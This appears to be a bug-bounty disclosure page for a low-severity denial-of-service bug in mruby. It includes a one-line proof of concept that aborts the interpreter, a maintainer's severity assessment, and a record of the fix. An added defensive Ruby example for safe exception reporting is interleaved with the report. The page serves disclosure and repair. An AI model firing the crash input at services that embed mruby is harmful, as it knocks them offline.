Denial of service in mruby/mruby

Valid

Reported on

May 4th 2022


Affected commit

49b8cef31f01c0d88d874e17714dff1fa5b85df0

Proof of Concept

raise SystemStackError.new BasicObject.new

Expected:

Raise the exception without aborting the program

Case output:

root:~/mruby/mruby/bin# ./mruby poc.rb 
poc.rb:1: can't convert BasicObject into String (TypeError)
Aborted

Test Platform:

Ubuntu 18.04
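The report's expected behaviour is that a malformed exception (one whose message payload is a BasicObject, which has no to_s) is reported rather than turning into an abort. The following is an added example, not code from the report or from mruby, showing the host-side pattern a sandboxing embedder (the scenario Matz describes below) wants at the boundary where untrusted code's exceptions are reported: extract the message in a way that can never raise, and convert every escaping exception into a value. It is written for CRuby, where Exception#message on a BasicObject payload raises the same TypeError ("can't convert BasicObject into String") as the mruby output above; the function names run_guarded, safe_message and safe_class_name are this example's own.

```ruby
# Added example: a non-aborting exception reporting boundary.
# Not part of the mruby project; names here are the example's own.

# Class name of any object, including BasicObject instances, which do not
# respond to #class themselves. Kernel#class is bound explicitly so the
# lookup works even when the object defines nothing.
def safe_class_name(obj)
  Kernel.instance_method(:class).bind(obj).call.name
rescue StandardError
  "unknown"
end

# Return a String describing exc without ever raising, covering both
# failure modes of a hostile exception: #message raising (BasicObject
# payload, as in the report's PoC) and #message returning a non-String.
def safe_message(exc)
  msg = begin
    exc.message
  rescue StandardError => e
    # In CRuby (and mruby) Exception#message on a BasicObject payload
    # raises TypeError while converting the payload to a String.
    return "#{exc.class}: <message unavailable: #{e.class}>"
  end
  return msg if msg.is_a?(String)
  "#{exc.class}: <non-String message of class #{safe_class_name(msg)}>"
end

# Run a block of (here, trusted test) code at a boundary and return
# [:ok, value] or [:error, description] instead of letting the exception
# reach a reporting path that assumes a well-formed message.
def run_guarded
  [:ok, yield]
rescue Exception => exc # Exception, not StandardError: SystemStackError is not a StandardError
  [:error, safe_message(exc)]
end

if __FILE__ == $0
  # The report's PoC, expressed as a block: reported, not aborted.
  p run_guarded { raise SystemStackError.new(BasicObject.new) }
  p run_guarded { raise "boom" }
  p run_guarded { 1 + 1 }
end
```

The point of rescuing Exception rather than StandardError in run_guarded is that the PoC's SystemStackError (like NoMemoryError and Interrupt) sits outside StandardError, so a boundary that only rescues StandardError would still let it escape into the default reporter.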

Acknowledgements

This bug was found by Ken Wong (@wwkenwong) from Black Bauhinia (@blackb6a) and Alex Cheung

Impact

Denial of service

Occurrences

We are processing your report and will contact the mruby team within 24 hours. 24 days ago
We have contacted a member of the mruby team and are waiting to hear back 23 days ago
Yukihiro "Matz" Matsumoto modified the Severity from Critical to Low 22 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Yukihiro "Matz" Matsumoto validated this vulnerability 22 days ago

This is a bug, but to use it as a security vulnerability, it requires: (a) use libmruby to sandbox untrusted input (e.g. mruby-engine) (b) enable MRB_USE_STDIO which is fundamentally more dangerous for untrusted input

Considering those requirements, I mark this as low

wwkenwong has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on 457abf 22 days ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
error.c#L204 has been validated